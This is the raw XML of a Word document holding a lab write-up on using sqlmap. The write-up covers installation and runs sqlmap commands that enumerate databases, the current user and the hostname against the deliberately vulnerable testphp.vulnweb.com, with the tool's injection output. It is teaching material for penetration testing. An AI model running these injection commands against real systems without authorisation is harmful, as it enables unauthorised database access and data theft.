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hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SQL map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                   By</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:left="6237"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A.Nookesh kumar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:ind w:left="6237"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DIET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step -1 Purpose and Usage of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool used for detecting and exploiting SQL injection vulnerabilities in web applications. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">It automates the process of identifying and exploiting SQL injection flaws, making it easier for penetration testers to assess the security of web applications. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step -2 Installation of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: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SQL Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is written in Python and can be easily installed on most operating systems.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 xml:space="preserve">You can install SQLMap by cloning its GitHub repository or by using package managers like apt (for Debian-based systems) or yum (for Red Hat-based systems).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 xml:space="preserve">For example, on Debian-based systems, you can install SQLMap using the following command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt-get install sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step -3 Identifying a Vulnerable Web Application:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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You can use intentionally vulnerable web applications like DVWA (Damn Vulnerable Web Application) or Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Goat for practicing SQL injection attacks. </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Install and set up DVWA on your local machine or use online platforms like OWASP Juice Shop.</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Example :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> www.testphp.vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step -4 Performing a Basic SQL Injection Attack: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 xml:space="preserve">Use SQLMap to perform a basic SQL injection attack against the chosen target.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Example command: sqlmap -u "http://target.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>page.php?id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>=1" --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">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This command will identify the databases present in the target application by exploiting the SQL injection vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process:</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b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Syntax: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>sqlmap -u &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>website_link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; --crawl=2 </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b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sqlmap -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">u </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://testphp.vulnweb.com/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="style85"/>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>http://testphp.vulnweb.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> --crawl=2</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rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">batch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>command for automatic response to yes/no questions while executing the commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5731510" cy="5182235"/>
            <wp:effectExtent l="0" t="0" r="254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5182235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> injection we got:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>testing 'Generic inline queries'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">testing 'MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                                                                                               </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OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'</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AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause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OR error-based - WHERE or HAVING clause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AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause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OR error-based - WHERE or HAVING clause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AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause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OR error-based - WHERE or HAVING clause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AND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OR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AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause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OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause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AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause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OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause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4.1 AND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4.1 OR error-based - WHERE or HAVING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OR error-based - WHERE or HAVING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PROCEDURE ANALYSE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error-based - Parameter replace (BIGINT UNSIGNED)'</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error-based - Parameter replace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error-based - Parameter replace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error-based - Parameter replace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error-based - Parameter replace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Parameter replace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Parameter replace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inline queries'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(comment)'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)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(query SLEEP - comment)'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&lt; 5.0.12 stacked queries (BENCHMARK - comment)'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>te</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>sting 'MySQL &lt; 5.0.12 stacked queries (BENCHMARK)'</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AND time-based blind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OR time-based blind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AND time-based blind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OR time-based blind (SLEEP)'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">GET parameter 'artist' appears to be 'MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)' injectable </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>testing 'Generic UNION query (NULL) - 1 to 20 columns'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>target URL appears to have 3 columns in query</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Results are saved in this path '/home/kali/.local/share/sqlmap/output/results-02252024_1012am.csv'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Using the following command </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat '/home/kali/.local/share/sqlmap/output/results-02252024_1012am.csv'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style179"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –batch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>provide databases and its names in the SQL</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5844540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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5844540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Here data found like version, user database name etc as shown in above image.</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6614160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>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5731510" cy="6614160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distL="0" distT="0" distB="0" distR="0">
            <wp:extent cx="5731510" cy="5410200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>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5731510" cy="541020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there are 3 tables are found.</w:t>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://testphp.vulnweb.com/artists.php?artist=1 --current-user --current-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="both"/>
        <w:rPr>
